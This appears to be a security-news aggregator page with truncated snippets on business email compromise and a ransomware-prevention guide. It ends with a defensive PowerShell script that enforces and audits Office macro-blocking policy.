why even the most technically sophisticated cyber defenses aren't always a match for low-tech threats. Combating BEC requires more than just advanced technologies and robust perimeter security; it requires humans to understand the threat. Here's why: Human-Powered Intelligence Trumps Automation  Since socially engineered attacks such as BEC are designed to exploit human instincts and emotions, human-powered intelligence naturally plays a critical role in defending against these attacks. I've written previously about the limitations of so-called automated intelligence and why human expertise and analysis are irreplaceable. BEC epitomizes this notion.  
After all, intelligence offerings that rely solely on automation tend to comprise little more than technical indicators of compromise (IoCs). BEC campaigns can have IoCs, but they tend to be less technical and more nuanced, often pertaining to an attacker's syntax, dialect, or other behavioral characteristics. While an IoC for a phishing campaign, for example, might be a sender address, a URL or an attachment hash, an IoC for a BEC campaign could be the phrase an attacker uses to open or sign off the email. Automated intelligence offerings and traditional network security solutions are generally not desig Guideline Wannacry
SecurityWeek.webp 2018-03-15 13:03:01 (Déjà vu) Microsoft Publishes Bi-annual Security Intelligence Report (SIR) (lien direct) NotPetya Wannacry
AlienVault.webp 2018-03-12 13:00:00 Countering Crypto-Malware: A Guide to Preventing a Ransomware Infection (lien direct) Ransomware had what Malwarebytes describes as a "banner year" in 2017. In the 2017 State of Malware report, telemetry gathered by the anti-malware provider reveals that business and consumer ransomware detections swelled by 90 percent and 93 percent, respectively. The monthly rate of ransomware attacks against businesses grew by approximately 10 times the rate of 2016 over the same period in 2017. A 700 percent increase in ransomware helped drive that surge, with GlobeImposter and WannaCry leading the way. (Figure: Malwarebytes 2017 State of Malware report, page 6.) Overall, Malwarebytes saw new ransomware development stagnate in the second half of 2017 as digital criminals shifted their focus to bring back old threats like banking Trojans and embrace new techniques, most notably malicious cryptocurrency miners. Those trends notwithstanding, ransomware isn't going away anytime soon. Users should therefore follow these five simple steps that can help them stay safe from a ransomware attack. Install an Anti-Malware Solution While some digital attackers are turning to fileless malware, many ransomware strains still carry a recognizable signature: a known file hash, byte pattern or behaviour that detection engines can match. Anti-malware solutions can use these fingerprints to detect and block a crypto-malware threat before it has time to execute on a computer. Victims of ransomware can also use these tools to clean their computers of ransomware before they restore their data using a free decryption tool or an available backup. Update Your Systems Regularly A common delivery vector for ransomware is an exploit kit: a software package, typically hosted on a compromised or malicious website, that probes a visitor's browser and plugins (historically Adobe Flash Player and similar components) for known vulnerabilities. If it finds a match with one of its hardcoded exploits, the kit launches code that exploits the vulnerability and in turn downloads ransomware onto the vulnerable machine. 
By staying current with software patches, however, users remove the vulnerabilities that exploit kits depend on, so the kit finds nothing to exploit. (Figure: How Exploit Kits Work. Source: Barkly.) Avoid Suspicious Links and Email Attachments As seen in the graphic above, one of the most common beginnings of an exploit kit campaign involves a phishing email recipient clicking on a malicious link that redirects them to a compromised website. Users aren't powerless against these tactics. They can make a point of not clicking suspicious links and email attachments, including those that come with messages sent to them from unfamiliar senders. Disable Macros for Office Documents Microsoft Office documents can contain macros: small programs (usually VBA) that users write to save time by automating repetitive tasks. Unfortunately, digital attackers often use Office macros as a downloader or dropper that fetches and launches the ransomware executable, and they capitalize on users' curiosity by tempting them with an unknown attachment that asks for macros to be enabled. Users can protect themselves against this trick by disabling macros in Office, by steering clear of unsolicited attachments, and by making it a rule to not enable macros in any document should they receive a prompt to do so. Install a Pop-Up Blocker Bad actors don't just rely on ema Guideline Wannacry
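The "disable macros" step above can be enforced rather than left to each user's Trust Center choice. The following PowerShell is an added example, not code from the AlienVault guide or from Microsoft: it writes the Office policy registry values that control macro behaviour and audits the result. It assumes Office 2016/2019/Microsoft 365 (registry version key `16.0`), writes under `HKCU\Software\Policies` so the settings are treated as policy and cannot be undone from the Trust Center, and is run per user (or pushed by GPO/Intune to the same keys).

```powershell
# Added example (not from the AlienVault article): enforce and audit the
# macro hardening the guide recommends, using Office's policy registry values.
# Assumptions: Office 2016/2019/Microsoft 365 (version key "16.0"); values
# written under HKCU\Software\Policies so the user cannot loosen them from
# the Trust Center. Takes effect when each Office application next starts.

$OfficeVersion = '16.0'
$Apps = 'Word', 'Excel', 'PowerPoint'

# VBAWarnings values as used by the Office Trust Center:
#   1 = enable all macros (never use)
#   2 = disable with notification (the "Enable Content" bar the article warns about)
#   3 = disable all except digitally signed macros
#   4 = disable all macros without notification
$DesiredVbaWarnings = 4

function Set-OfficeMacroPolicy {
    param(
        [ValidateSet(2, 3, 4)]
        [int]$VbaWarnings = $DesiredVbaWarnings
    )
    foreach ($app in $Apps) {
        $path = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\$app\Security"
        if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
        # Macro behaviour for all documents opened by this application
        Set-ItemProperty -Path $path -Name 'VBAWarnings' -Value $VbaWarnings -Type DWord
        # Block macros outright in files carrying the Mark of the Web
        # (downloads and email attachments), regardless of VBAWarnings
        Set-ItemProperty -Path $path -Name 'blockcontentexecutionfrominternet' -Value 1 -Type DWord
    }
}

function Get-OfficeMacroPolicy {
    foreach ($app in $Apps) {
        $path = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\$app\Security"
        $props = if (Test-Path $path) { Get-ItemProperty -Path $path } else { $null }
        [pscustomobject]@{
            App               = $app
            VBAWarnings       = $props.VBAWarnings
            BlockFromInternet = $props.blockcontentexecutionfrominternet
            # Compliant = unsigned macros blocked AND internet-sourced macros blocked
            Compliant         = ($props.VBAWarnings -ge 3) -and
                                ($props.blockcontentexecutionfrominternet -eq 1)
        }
    }
}

Set-OfficeMacroPolicy
Get-OfficeMacroPolicy | Format-Table -AutoSize
```

Use `VBAWarnings` 3 instead of 4 only where signed internal macros are genuinely needed; the `blockcontentexecutionfrominternet` value is the one that closes the "unknown attachment asking to enable content" path the article describes, so keep it at 1 in either case. Running `Get-OfficeMacroPolicy` alone is a harmless audit and is a reasonable check to fold into endpoint compliance reporting.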
Last update at: 2024-05-12 13:07:59
See our sources.
My email:

To see everything: Our RSS (filtrered) Twitter